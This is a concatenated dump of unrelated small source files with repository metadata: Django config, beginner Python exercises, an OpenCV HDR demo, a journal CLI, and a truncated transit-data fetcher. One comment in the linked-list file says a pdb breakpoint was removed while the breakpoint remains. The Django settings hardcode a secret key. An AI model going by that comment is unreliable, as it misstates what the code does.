"41771787+hasculdr@users.noreply.github.com"
] | 41771787+hasculdr@users.noreply.github.com |
0cd99b99051b2ca38f4d2447dd84e385852f0b0e | c1eea031212bdacd63983202577d9dc228b24ad9 | /aula139ate142-ecommerce-slug-automatico-e-cadastro-de-produtos/loja/urls.py | 57d599daab3e22fba74272c6d0e40262c3d7c21c | [
"MIT"
] | permissive | axellbrendow/python3-basic-to-advanced | 6677cef1390b4b3b089b45410df8755cb3c5a143 | fd8b1b325ed199f8bc770dc038752ea57cbbd926 | refs/heads/master | 2023-01-12T02:37:33.170469 | 2020-07-12T16:32:32 | 2020-07-12T16:32:32 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,172 | py | """loja URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.0/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path, include
from django.conf import settings
from django.conf.urls.static import static
urlpatterns = [
path('admin/', admin.site.urls),
] + static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
# TODO: Remover debug toolbar
if settings.DEBUG:
import debug_toolbar
urlpatterns = [
path('__debug__/', include(debug_toolbar.urls)),
# For django versions before 2.0:
# url(r'^__debug__/', include(debug_toolbar.urls)),
] + urlpatterns
| [
"breno.axel@gmail.com"
] | breno.axel@gmail.com |
f218fe1f46c2c078c7f63ea04605b414e287a4dd | 158c21ea004d62c07949950a8516dc20d0f3127a | /kasir.py | 910957911d439809ca53de586cc0c5ccf3a9917e | [] | no_license | Rizky1408/Kasir-1 | c7b37e124ee37e9dfa61b932d2cd7410e209a609 | 1587979e8b377e06ccfc69f8d461046cda8cd2fb | refs/heads/main | 2023-03-26T05:26:41.486421 | 2021-03-20T14:22:52 | 2021-03-20T14:22:52 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,349 | py | pilihan = "x"
while pilihan == "x" :
print("=========================================================")
print("|\t\t\t SEBLAK SEHATI \t\t\t|")
print("|\t\t\t DAFTAR MENU \t\t\t|")
print("| \t1. Seblak Ceker \t\t10000 \t\t|")
print("| \t2. Seblak Sosis \t\t10000 \t\t|")
print("| \t3. Seblak Bakso \t\t10000 \t\t|")
print("| \t4. Seblak Seafood \t\t12000 \t\t|")
print("| \t5. Seblak Sosis+Bakso \t\t12000 \t\t|")
print("| \t6. Seblak Sosis+Bakso+Mie \t15000 \t\t|")
print("| \t7. Seblak Spesial \t\t15000 \t\t|")
print("| \t8. Seblak Komplit \t\t20000 \t\t|")
print("=========================================================")
print()
makanan = int(input("Mau Seblak Apa (Masukkan angka) = "))
print()
jumlah = int(input("Berapa porsi (Masukkan angka)? = "))
if makanan == 1:
harga = 10000*jumlah
elif makanan == 2:
harga = 10000*jumlah
elif makanan == 3 :
harga = 10000*jumlah
elif makanan == 4 :
harga = 12000*jumlah
elif makanan == 5 :
harga = 12000*jumlah
elif makanan == 6 :
harga = 15000*jumlah
elif makanan == 7 :
harga = 15000*jumlah
elif makanan == 8 :
harga = 20000*jumlah
print()
print("=========================================")
print("|\t\tDAFTAR MINUM\t\t|")
print("|\t1. Es Jeruk\t\t7000\t|")
print("|\t2. Es teh Manis\t\t5000\t|")
print("|\t3. Air Putih\t\t3000\t|")
print("|\t4. Teh Pucuk\t\t4000\t|")
print("|\t5. Tidak memesan minuman\t|")
print("=========================================")
minum = int(input("Mau minum apa? = "))
pcs = int(input("Berapa pcs? = "))
if minum == 1:
jeruk=7000*pcs
total= harga+jeruk
elif minum == 2:
esteh=5000*pcs
total= harga+esteh
elif minum == 3:
air=3000*pcs
total=harga+air
elif minum == 4:
pucuk=4000*pcs
total=harga+pucuk
elif minum == 5:
pass
#Menghitung total harga
if minum == 5:
print("Total Pembayaran = ",harga)
elif jumlah > 5:
diskon = total-3000
print("Total Pembayaran = ",diskon)
elif jumlah < 5:
print("Total Pembayaran = ",total)
break
| [
"noreply@github.com"
] | Rizky1408.noreply@github.com |
962dfa2d14312d478ac13e9db700d04210be2a66 | a64ed9b09efdeecc5139f27d644d04593ace0e50 | /cars/apps/migrations/0002_auto_20141104_1059.py | a5c4912c93941b10e723ae05c11fec8201aeec51 | [] | no_license | jeet15/Django-JSON | 0cdadbc0384c491e776d122716ba253baa6d9ff0 | 962f5404ae2f5877a35476250630352a71736e47 | refs/heads/master | 2016-09-05T23:37:17.378629 | 2014-11-21T12:24:49 | 2014-11-21T12:24:49 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 457 | py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('apps', '0001_initial'),
]
operations = [
migrations.AlterField(
model_name='car',
name='image',
field=models.FileField(upload_to=b'C:/project/sample/car/cars/media/pics/'),
preserve_default=True,
),
]
| [
"gurjeetsingh1506@gmail.com"
] | gurjeetsingh1506@gmail.com |
9350861b47687994cd410e6e244b97737bbc9948 | fe161a9f81cb2c0d1f281e05aad3cb768fc8f8b9 | /Chap8-CompuPhotograhpy/3-HDR/HDR.py | 11fdd9bfab202d7cb98cc54bf9f6d2f26e6f76e5 | [
"MIT"
] | permissive | wxzs5/LearnOpenCV | 234b4884dadb0fad4272815be9a93d8b186dc7cd | dee92d96af593d617d784700abab78c8d45cf74c | refs/heads/master | 2021-05-07T22:32:55.667232 | 2018-04-19T07:45:31 | 2018-04-19T07:45:31 | 107,265,611 | 3 | 2 | null | null | null | null | UTF-8 | Python | false | false | 1,463 | py | import cv2 as cv
import numpy as np
from matplotlib import pyplot as plt
# Loading exposure images into a list
img_fn = ["../../img/img0.png", "../../img/img1.png", "../../img/img2.png", "../../img/img3.png"]
img_list = [cv.imread(fn) for fn in img_fn]
exposure_times = np.array([15.0, 2.5, 0.25, 0.0333], dtype=np.float32)
merge_debvec = cv.createMergeDebevec()
hdr_debvec = merge_debvec.process(img_list, times=exposure_times.copy())
merge_robertson = cv.createMergeRobertson()
hdr_robertson = merge_robertson.process(img_list, times=exposure_times.copy())
# Tonemap HDR image
tonemap1 = cv.createTonemapDurand(gamma=2.2)
res_debvec = tonemap1.process(hdr_debvec.copy())
tonemap2 = cv.createTonemapDurand(gamma=1.3)
res_robertson = tonemap2.process(hdr_robertson.copy())
# Exposure fusion using Mertens
merge_mertens = cv.createMergeMertens()
res_mertens = merge_mertens.process(img_list)
# Convert datatype to 8-bit and save
res_debvec_8bit = np.clip(res_debvec*255, 0, 255).astype('uint8')
res_robertson_8bit = np.clip(res_robertson*255, 0, 255).astype('uint8')
res_mertens_8bit = np.clip(res_mertens*255, 0, 255).astype('uint8')
plt.subplot(1, 3, 1), plt.imshow(res_debvec_8bit)
plt.title('debvec'), plt.xticks([]), plt.yticks([])
plt.subplot(1, 3, 2), plt.imshow(res_robertson_8bit)
plt.title('robertson'), plt.xticks([]), plt.yticks([])
plt.subplot(1, 3, 3), plt.imshow(res_mertens_8bit)
plt.title('mertens'), plt.xticks([]), plt.yticks([])
plt.show() | [
"790230517@qq.com"
] | 790230517@qq.com |
bf68971a5d62dc3074b046a532f8dd092e7aefce | 5e07a10ba21cae5baad3b0eb93fcb08968bab68f | /swap_pairs.py | f7e8c427f7e80090ca12464aff4feb2087e0fe90 | [] | no_license | billstark/leetcode | 530b4b06e23d36d5b7816498ba049ea2ea2e1df3 | 35cadf6b0d4942c919696ef8d35acd5e7617b627 | refs/heads/master | 2020-04-15T04:39:15.517961 | 2019-01-14T15:44:26 | 2019-01-14T15:44:26 | 164,390,898 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 542 | py | class ListNode:
    def __init__(self, x):
        """Create a singly linked list node holding x; next starts as None."""
        self.val = x
        self.next = None
def swapPairs(head):
    """Swap every pair of adjacent nodes in a linked list; return the new head."""
    if head is None or head.next is None:
        return head
    new_head = head.next
    prev = None
    node = head
    while node is not None and node.next is not None:
        partner = node.next
        node.next = partner.next
        partner.next = node
        if prev is not None:
            prev.next = partner
        prev = node
        node = node.next
    return new_head
# Demo: build the list 1 -> 2 -> 3 -> 4 and swap adjacent pairs
# (expected result: 2 -> 1 -> 4 -> 3).
# FIX: removed the leftover `import pdb; pdb.set_trace()` debugger
# breakpoint that halted the script before swapPairs was ever called.
head = ListNode(1)
a = ListNode(2)
b = ListNode(3)
c = ListNode(4)
head.next = a
a.next = b
b.next = c
result = swapPairs(head)
import pdb; pdb.set_trace() | [
"billstark1996@gmail.com"
] | billstark1996@gmail.com |
6e47832275d2037408e61f2f79828326e1d75b7b | 6d5cd84339cb3e1d59915adf34531d5145a1ea51 | /14_a.py | f86e8c18a803f2bef7e894f9b409a3fd710872dc | [] | no_license | ChrisDoubleEwe/AdventOfCode2015 | 8ba915a9a799c86bdfca24bbe85172cbffd722c9 | a3d1ebc95474c2290f46ac4a7b5365d7d5b77074 | refs/heads/main | 2023-03-01T06:06:14.689768 | 2021-02-07T22:23:14 | 2021-02-07T22:23:14 | 334,727,758 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,191 | py | import sys
from ctypes import *
import copy
import hashlib
import itertools
import re
from printf import printf
with open("14_input.txt") as f:
content = f.readlines()
data = []
deer = []
for c in content:
match = re.search('([a-zA-Z]*) can fly ([0-9]*) .* for ([0-9]*) seconds, but then must rest for ([0-9]*) seconds.', c)
if match:
deer.append(match.group(1))
d = []
d.append(match.group(1)) # 0 - Name
d.append(int(match.group(2))) # 1 - dist
d.append(int(match.group(3))) # 2 - fly time
d.append(int(match.group(4))) # 3 - rest time
d.append(1) # 4 - 1= flying ; 0 = rest
d.append(int(match.group(3))) # 5 - timer
d.append(0) # 6 - total dist
data.append(copy.deepcopy(d))
for sec in range(0, 2504):
for z in range(0, len(deer)):
i = data[z]
if i[4] == 1:
i[6] += i[1]
i[5] += -1
if i[5] == 0:
i[4] = 0
i[5] = i[3]
continue
else:
i[5] += -1
if i[5] == 0:
i[4] = 1
i[5] = i[2]
max = 0
max_p = []
for p in data:
if p[6] > max:
max = p[6]
max_p = p
print "Part A: " + str(max_p[6])
| [
"chris@offwhitehouse.co.uk"
] | chris@offwhitehouse.co.uk |
80a0fd2bfe61535c36a73a95861ea8fb3dc46571 | 6a6b1655fa5f0d3f095ca5e5527ac89285b1607e | /rosa-env/bin/django-admin.py | 3cfec5dcc1dc3441a45ff20d6dc9bf0ba5a392c2 | [] | no_license | BEEFF/DjangoTix | 137b25e86995edd1f4f5481253fea0be3acbee7b | acccc9693216584e83944b60e765c025772b922f | refs/heads/main | 2023-07-04T03:11:46.293414 | 2021-08-03T14:42:42 | 2021-08-03T14:42:42 | 392,349,775 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 670 | py | #!/home/t/rosa/rosa-env/bin/python3
# When the django-admin.py deprecation ends, remove this script.
import warnings
from django.core import management
# Importing RemovedInDjango40Warning doubles as a version probe: the class
# only exists while the django-admin.py deprecation window (Django 3.1-3.x)
# is open.  On Django 4.0+ the import fails and we replace it with an
# actionable error message.
try:
    from django.utils.deprecation import RemovedInDjango40Warning
except ImportError:
    raise ImportError(
        'django-admin.py was deprecated in Django 3.1 and removed in Django '
        '4.0. Please manually remove this script from your virtual environment '
        'and use django-admin instead.'
    )
if __name__ == "__main__":
    # Warn on every invocation, then defer to the regular management CLI.
    warnings.warn(
        'django-admin.py is deprecated in favor of django-admin.',
        RemovedInDjango40Warning,
    )
    management.execute_from_command_line()
| [
"okeeffe_thomas@yahoo.co.uk"
] | okeeffe_thomas@yahoo.co.uk |
0a75f92da21ee8ae0552cbb4fffd23b6bc972c79 | f7525456f5451926282cba840dae1c4adba3573f | /STEPIK.py | f7376ff86ba6b0f3ae7a501f37f92df71bd0d3a7 | [
"MIT"
] | permissive | AlPus108/Python_lessons | 1f2ac6e1ce5a344e0c900249ef7864d257424436 | 0e96117d9a8b76fd651e137fc126ddedaa6accd9 | refs/heads/master | 2021-02-27T06:37:10.239125 | 2020-05-14T21:27:29 | 2020-05-14T21:27:29 | 245,588,486 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 14,605 | py | # ЭКРАНИРОВАНИЕ
# a = "строка с \" кавычкой двойной и \' одинарной"
# Чтобы в строке появился символ обратной косой черты
# a = "Строка с обратным слешем \\"
# Перенос строки
# a = "Первая строка \nВторая строка
'''
Сделать перенос строки в Питоне можно и другим способом — объявить строку с помощью тройных кавычек.
То есть вы как бы сразу расставляете переносы строк прямо в программе, записывая значение переменной на разных строках.
Со строками, объявленными с помощью одинарных кавычек, так сделать не получится.
a = """Первая строка
Вторая строка
Третья строка"""
Помните, что если строка начинается с трёх кавычек, то и заканчиваться она должна тремя такими же кавычками.
'''
# a = '''Первая строка
# Вторая строка
# Третья строка'''
# print(a)
# ------------------------------------------
'''
result = print('Что вернет функция print?')
print(result)
Первой строкой эта программа выведет текст "Что вернет функция print?", а второй — слово None.
Специально для обозначения «ничего» в Питоне есть отдельный тип данных NoneType.
Переменные этого типа могут иметь только одно значение — None. None — это «никакое» или «неопределенное» значение.
В программе выше переменная result как раз и будет иметь значение None. Это одно из ключевых слов языка и,
если вы хотите присвоить None переменной, его надо писать как есть, без кавычек:
z = None
'''
# ---------------------------------------------------
# КВАДРАТНЫЙ КОРЕНЬ ИЗ ЧИСЛА
# print(9 ** 0.5) # Возвведение числа в степень 0.5 дает квадратный корень этого числа
# ----------------------------------------------------
# фОРМАТ ЕСТЕСТВЕННЫХ ЧИСЕЛ - через е-1
# print(5e-1) # это то же самое, что и 0.5. Число пять умножается на 10 в степени -1
# print(5 * 10**-1) # запись идентичная первой
#
# print(1234e-2) # это то же самое выражение, что и
# print(1234 * 10**-2)
#
# # Также можно использовать положительную степень
# print(1234e2) # аналогично (1234 * 10**2)
# print(1234 * 10**2) # 10**2 - 10 в квадрате
# -------------------------------------------------------
# #Помните, что любые арифметические операции выше по приоритету операций сравнения и логических операторов.
# -------------------------------------------------------
# Площадь треугольника:
# S = √p(p - a)(p - b)(p - c), где p = (a + b + c) / 2
# где (a + b + c) / 2
# Площадь прямоугольника:
# S = a · b
# Площадь круга:
# S = π r2
# Вычисление площади фигур
# s = input()
# if s == "треугольник":
# a = float(input())
# b = float(input())
# c = float(input())
# p = (a + b + c) / 2
# print((p*((p-a)*(p-b)*(p-c)))**0.5) # Вычислене площади треугольника по формуле Герона
# elif s == "прямоугольник":
# a = float(input())
# b = float(input())
# print(a * b)
# elif s == "круг":
# r = float(input())
# print(3.14 * r**2)
# ----------------------------------------------------
# Склонение существительных
# x = int(input())
#
# if x % 10 == 1 and x % 100 != 11:
# print(x, 'программист')
# # elif x % 10 == 2 and x % 20 != 12 or x % 10 == 3 and x % 20 != 13 or x % 10 == 4 and x % 20 != 14:
# elif (x % 10 >= 2) and (x % 10 <= 4) and (x % 100 < 10 or x % 100 > 20):
# print(x, 'программиста')
# else:
# print(x, 'программистов')
# --------------------------------------------------
# Счастливый билет. Сумма первых трех цифр должна быть равна сумме последних трех
# x = int(input())
# n1 = x % 10
# x = x // 10
# n2 = x % 10
# x = x // 10
# n3 = x % 10
# x = x // 10
# n4 = x % 10
# x = x // 10
# n5 = x % 10
# x = x // 10
# n6 = x % 10
# if n1 + n2 + n3 == n4 + n5 + n6:
# print('Счастливый')
# else:
# print("Обычный")
# ------------------------------------------------
# Выводим треугольник из звездочек
# n = int(input())
# i = 1
# while i <= n:
# print('*' * i)
# i += 1
#
# stars = '*'
# while len(stars) <= n:
# print(stars)
# stars += '*'
# ----------------------------------------------
# Вычисляем сумму числе на задаваемом отрезке от а до b
# a = int(input())
# b = int(input())
# i = a
# while i != b:
# i += 1
# a += i
#
# print(a)
# ----------------------------------------
# Суммируем вводимые числа и, после первого нуля, подсчитываем сумму этих чисел
# n = 1
# i = 0
# while n != 0:
# n = int(input())
# i += n
# print(i)
# -----------------------------------------------------
# Ищем наименьшее общее кратное двух чисел
# a = int(input())
# b = int(input())
# i = 1
#
# while i % a != 0 or i % b != 0:
# i = i + 1
# print(i)
# --------------------------------------------------
# i = 0
#
# while i < 5:
# a, b = input("Введите два любых числа через пробел").split() # split() разделяет пары чисел по пробелу между ними
# a = int(a)
# b = int(b)
# if(a == 0) and (b == 0): # Если обе введенных цифры равны 0
# break # досрочно завершаем цикл
# if(a == 0) or (b == 0):
# continue # код ниже не выполняется и переходим к следующей итерации
# # (в том случае, если по условию она должна быть), вывод произведения чисел и приращивание i не происходит.
# То есть, эту пару чисел игнорируем
# print(a * b)
# i += 1
# ---------------------------------------------
# Напишите программу, которая считывает целые числа с консоли по одному числу в строке.
#
# Для каждого введённого числа проверить:
# если число меньше 10, то пропускаем это число;
# если число больше 100, то прекращаем считывать числа;
# в остальных случаях вывести это число обратно на консоль в отдельной строке.
# while True:
# n = int(input())
# if n < 10:
# continue
# if n > 100:
# break
# else:
# print(n)
# -------------------------------------------------
# Квадрат из звездочек в цикле for
# a = int(input())
# for i in range(a):
# print('*' * a)
# Двойной цикл
# n = int(input())
# for i in range(n):
# for j in range(n): # внутренний цикл выводит звездочку n-раз и создает строку
# print('*', end=' ') # end - указываем, что будем использовать в качестве разделителя.
# # Вданном случае "пробел". Если end отсутствует, будет обычный перевод на новую строку
# print() # этот print делает новую строку без вывода на экран
# -----------------------------------------------------------
# Таблица умножения
# Напишите программу, на вход которой даются четыре числа aa, bb, cc и dd, каждое в своей строке.
# Программа должна вывести фрагмент таблицы умножения для всех чисел отрезка [a; b]
# на все числа отрезка [c;d].
#
# Числа a, b, c и d являются натуральными и не превосходят 10, a <= b, c <= d.
#
# Следуйте формату вывода из примера, для разделения элементов внутри строки используйте '\t' — символ табуляции.
# Заметьте, что левым столбцом и верхней строкой выводятся сами числа из заданных отрезков
# — заголовочные столбец и строка таблицы.
# a = int(input())
# b = int(input())
# c = int(input())
# d = int(input())
#
# print()
# for x in range(c, d + 1):
# print('\t', x, end='')
# print()
# for i in range(a, b + 1):
# print(i, end='\t')
# for n in range(c, d + 1):
# if n < 10:
# print('', n * i, end='\t')
# else:
# print(n * i, end='\t')
# print()
# ------------------------------------------
# Вариант 1 Вывести сумму всех нечетных числел от a до b (включая границы)
# a, b = input().split() # получвем первое и последнее значения диапазона в одной строке через пробел
# a = int(a) # переводим значения в цифоровой формат
# b = int(b)
# x = 0
# for i in range(a, b+1): # циклом проходимся по множеству от a до b
# if i % 2 == 1: # если значение нечетное
# x += i # складываем значения
# print(x) # выводим сумму
#---------------------------------------------
# Вариант 2 Вывести сумму всех нечетных числел от a до b (включая границы)
# a, b = input().split() # получвем первое и последнее значения диапазона в одной строке через пробел
# a = int(a) # переводим значения в цифоровой формат
# b = int(b)
# x = 0
# if a % 2 == 0: # если первое число четное
# a = a + 1 # увеличиваем его на 1 (берем ближайшее к нему нечетное число)
# for i in range(a, b+1, 2): # циклом проходимся по множеству от a до b с шагом 2 (через 1) по нечетным числам
# x += i # складываем значения
# print(x) # выводим сумму
#---------------------------------------------
# Вариант 3 Вывести сумму всех нечетных числел от a до b (включая границы)
# Отличается от предыдущего вводом данных
# a, b = (int(i) for i in input().split()) # В такой ситуации, когда нам нужно к последовательности объектов
# # применить одну и ту же ф-ю, мы применяем специальную конструкцию,
# # которая называется list comprehensive (комплексный список).
# # В начале указываем, какую ф-ю мы применяем int(), которую применям для каждого элемента последовательности
# # Выражение, генерирующее эту последвательность, записывается справа input().split().
# # Для каждого объета этой последовательности через цикл применяем ф-ю int()
# # Такую последовательность удобно применять, когда несколько чисел выводятся в одной строке
# x = 0
# if a % 2 == 0: # если первое число четное
# a = a + 1 # увеличиваем его на 1 (берем ближайшее к нему нечетное число)
# for i in range(a, b+1, 2): # циклом проходимся по множеству от a до b с шагом 2 (через 1) по нечетным числам
# x += i # складываем значения
# print(x) # выводим сумму
#---------------------------------------------
'''
Напишите программу, которая считывает с клавиатуры два числа a и b,
считает и выводит на консоль среднее арифметическое всех чисел из отрезка [a; b], которые делятся на 3.
В приведенном ниже примере среднее арифметическое считается для чисел на отрезке [-5; 12].
Всего чисел, делящихся на 3, на этом отрезке 6: -3, 0, 3, 6, 9, 12. Их среднее арифметическое равно 4.5
На вход программе подаются интервалы, внутри которых всегда есть хотя бы одно число, которое делится на 3.
'''
# a, b = (int(i) for i in input().split())
# x = 0
# z = 0
# for i in range(a, b+1):
# if i % 3 == 0:
# x += i
# z += 1
# print(x / z)
#------------------------------------------
| [
"alex.pustovoy@gmail.com"
] | alex.pustovoy@gmail.com |
ab4b2af750e03de8a750d4170d8e27d4684868f2 | b858eb6e2a67f6c013e21a2a8a256a04775cc474 | /LittleStation/LittleStation/settings.py | 4f0ce9fee9c19c8e5823f9c78cb209f7e7b9abc5 | [] | no_license | windangle/xiaoyaoyu_test | 5bc72a50fcefdc8f0d8e19b647bff037d69673e0 | c53ee3e016ed8eea9782fc0173a4750604f83514 | refs/heads/master | 2020-04-14T07:49:52.882686 | 2019-06-22T15:49:23 | 2019-06-22T15:49:23 | 163,723,243 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,109 | py | """
Django settings for LittleStation project.
Generated by 'django-admin startproject' using Django 2.1.3.
For more information on this file, see
https://docs.djangoproject.com/en/2.1/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.1/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.1/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
# NOTE(review): this key is committed to source control; rotate it and load it
# from the environment before any production deployment.
SECRET_KEY = '6-m)k@z$_k-&-kqgmad=5_llgvz6l*1*h6u=e1tqpimv^%fww+'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
# Empty host whitelist: with DEBUG=True Django only serves localhost-style
# hosts, so this configuration is local-development only.
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
    'django.contrib.admin',
    'django.contrib.auth',
    'django.contrib.contenttypes',
    'django.contrib.sessions',
    'django.contrib.messages',
    'django.contrib.staticfiles',
]
MIDDLEWARE = [
    'django.middleware.security.SecurityMiddleware',
    'django.contrib.sessions.middleware.SessionMiddleware',
    'django.middleware.common.CommonMiddleware',
    'django.middleware.csrf.CsrfViewMiddleware',
    'django.contrib.auth.middleware.AuthenticationMiddleware',
    'django.contrib.messages.middleware.MessageMiddleware',
    'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'LittleStation.urls'
TEMPLATES = [
    {
        'BACKEND': 'django.template.backends.django.DjangoTemplates',
        'DIRS': [],
        'APP_DIRS': True,
        'OPTIONS': {
            'context_processors': [
                'django.template.context_processors.debug',
                'django.template.context_processors.request',
                'django.contrib.auth.context_processors.auth',
                'django.contrib.messages.context_processors.messages',
            ],
        },
    },
]
WSGI_APPLICATION = 'LittleStation.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.1/ref/settings/#databases
# SQLite file next to the project; fine for development, not for concurrent
# production traffic.
DATABASES = {
    'default': {
        'ENGINE': 'django.db.backends.sqlite3',
        'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
    }
}
# Password validation
# https://docs.djangoproject.com/en/2.1/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
    {
        'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
    },
]
# Internationalization
# https://docs.djangoproject.com/en/2.1/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.1/howto/static-files/
STATIC_URL = '/static/'
| [
"green8237@sina.com"
] | green8237@sina.com |
3919e6b7a51097e8a8afcb8aca30ec4219c26e37 | 6a3cfbab9671951edaaebdedb45b77aeaea69ce3 | /journal_ui.py | 0cd543e8750dac6d5afddeb42496253fbc7c1f9c | [] | no_license | dcook8080/it-python | 3aebc63b8100f05c44035f91dc829e8b9c0f355a | 10ac9047be356c23f0b3a988d8e75a27bbada43a | refs/heads/master | 2020-07-25T13:38:58.945590 | 2019-11-20T16:40:30 | 2019-11-20T16:40:30 | 208,309,766 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 902 | py | import journal
from banner import banner
banner("Journal", "Dylan Cook")
def main():
    # Entry point: delegate straight to the interactive menu loop.
    run_event_loop()
def run_event_loop():
    """Interactive menu loop.

    Loads the journal named ``filename``, dispatches List/Add commands until
    the user chooses e[x]it, then persists the (possibly modified) journal.
    """
    filename = "default"
    journal_data = journal.load(filename)#[]
    done = False
    while not done:
        choice = input("[L]ist entries, [A]dd an entry, E[x]it: ").upper()
        if choice == "L":
            list_entries(journal_data)
        elif choice == "A":
            add_entry(journal_data)
        elif choice == "X":
            done = True
        else:
            print("Sorry, I don't understand")
    journal.save(filename, journal_data)
def list_entries(data):
    """Print every journal entry, newest first, numbered from 1."""
    print("Your journal entries:")
    for position, text in enumerate(reversed(data), start=1):
        print(f"{position} - {text}")
def add_entry(data):
    """Prompt for a new journal entry and record it via the journal module.

    Fix: the prompt advertises "<ENTER> to exit", but the original recorded
    the empty string as a real entry; blank/whitespace-only input is now
    ignored instead of being appended to the journal.
    """
    entry = input("Type your entry, <ENTER> to exit: \n")
    if entry.strip():
        journal.add_entry(entry, data)
#data.append(entry) | [
"dylanjcook73@gmail.com"
] | dylanjcook73@gmail.com |
e843a52df42cbe564b8befaa6a35a6e9d894953f | 437e905d8c214dc25c559b1dc03eaf9f0c85326f | /is28/konnov28/python1/Python1/12.py | aa50468a81e6cdc274f644138376969256de9952 | [] | no_license | AnatolyDomrachev/karantin | 542ca22c275e39ef3491b1c0d9838e922423b5a9 | 0d9f60207e80305eb713fd43774e911fdbb9fbad | refs/heads/master | 2021-03-29T03:42:43.954727 | 2020-05-27T13:24:36 | 2020-05-27T13:24:36 | 247,916,390 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 466 | py | n = int(input("Введите натуральное n: "))
f_prev = 1
f_prev_prev = 1
print("Число Фибоначчи под номером ", 0, " = ", 1)
if n > 0:
print("Число Фибоначчи под номером ", 1, " = ", 1)
for i in range(2, n + 1):
f_current = f_prev + f_prev_prev
print("Число Фибоначчи под номером ", i, " = ", f_current)
f_prev_prev = f_prev
f_prev = f_current
| [
"you@example.com"
] | you@example.com |
473c45e3b9efe6e1f6479df4a0b96666c50ec289 | e6bcb1d409e9227bbab1954a74edeeb4efae97ae | /main.py | 675bbe5121d2dfa9cd2f6d48e249fe30a9ffa6c6 | [] | no_license | keanulee/muni-tracker | fdbb3c1e0de1f2af2e2507ab79207783ac15b75b | 972bbb6fc77e6dc78f09f796ec81d361d348235c | refs/heads/master | 2021-08-02T00:56:53.436712 | 2021-07-22T21:45:18 | 2021-07-22T21:45:18 | 110,642,752 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,361 | py | import webapp2
import urllib2
import time
import json
from wsgiref.handlers import format_date_time
def formatValue(x):
    """Encode one NextBus vehicle record as a Firestore 'arrayValue'.

    The array layout is positional and fixed: route tag, geo point, heading,
    speed (km/h), predictability flag, seconds since last report, direction
    tag, and leading-vehicle id (the last two default to '' when absent).
    """
    values = []
    values.append({'stringValue': x['routeTag']})
    values.append({'geoPointValue': {'latitude': x['lat'], 'longitude': x['lon']}})
    values.append({'integerValue': int(x['heading'])})
    values.append({'doubleValue': float(x['speedKmHr'])})
    values.append({'booleanValue': x['predictable'] == 'true'})
    values.append({'integerValue': int(x['secsSinceReport'])})
    values.append({'stringValue': x.get('dirTag', '')})
    values.append({'stringValue': x.get('leadingVehicleId', '')})
    return {'arrayValue': {'values': values}}
def flattenValue(x):
    """Collapse a Firestore typed value into a plain Python value.

    map -> dict, array -> map() over elements, geo point -> [lat, lon],
    scalars -> their payload (integers coerced with int()).  Falls through
    to an implicit None for unrecognized wrappers, as before.
    """
    if 'mapValue' in x:
        fields = x['mapValue']['fields']
        return dict((key, flattenValue(val)) for key, val in fields.items())
    if 'arrayValue' in x:
        return map(flattenValue, x['arrayValue']['values'])
    if 'geoPointValue' in x:
        point = x['geoPointValue']
        return [point['latitude'], point['longitude']]
    if 'stringValue' in x:
        return x['stringValue']
    if 'integerValue' in x:
        return int(x['integerValue'])
    if 'doubleValue' in x:
        return x['doubleValue']
    if 'booleanValue' in x:
        return x['booleanValue']
def flattenDocument(doc):
    # A Firestore document carries its data under 'fields'; wrapping it as a
    # mapValue lets flattenValue's existing map branch handle it.
    return flattenValue({ 'mapValue': doc })
class FetchHandler(webapp2.RequestHandler):
    """Polls NextBus for sf-muni train locations and archives a snapshot.

    Each snapshot is stored as one Firestore document (keyed by the unix
    timestamp of the fetch) in every project listed in ``_PROJECTS``, and
    echoed back as the HTTP response body.

    Improvements over the original: the two byte-identical Firestore POST
    blocks are factored into ``_store``, and the unused ``enumerate`` index
    in the fields comprehension is removed.
    """

    # Firestore projects that each receive a copy of the snapshot.
    _PROJECTS = ('sfmuni-tracker', 'go-dashboard-2ff4e')

    def _store(self, project, now, body):
        # One document per fetch; the timestamp doubles as the document id.
        req = urllib2.Request(
            'https://firestore.googleapis.com/v1beta1/projects/%s/databases/(default)/documents/t?documentId=%d'
            % (project, now))
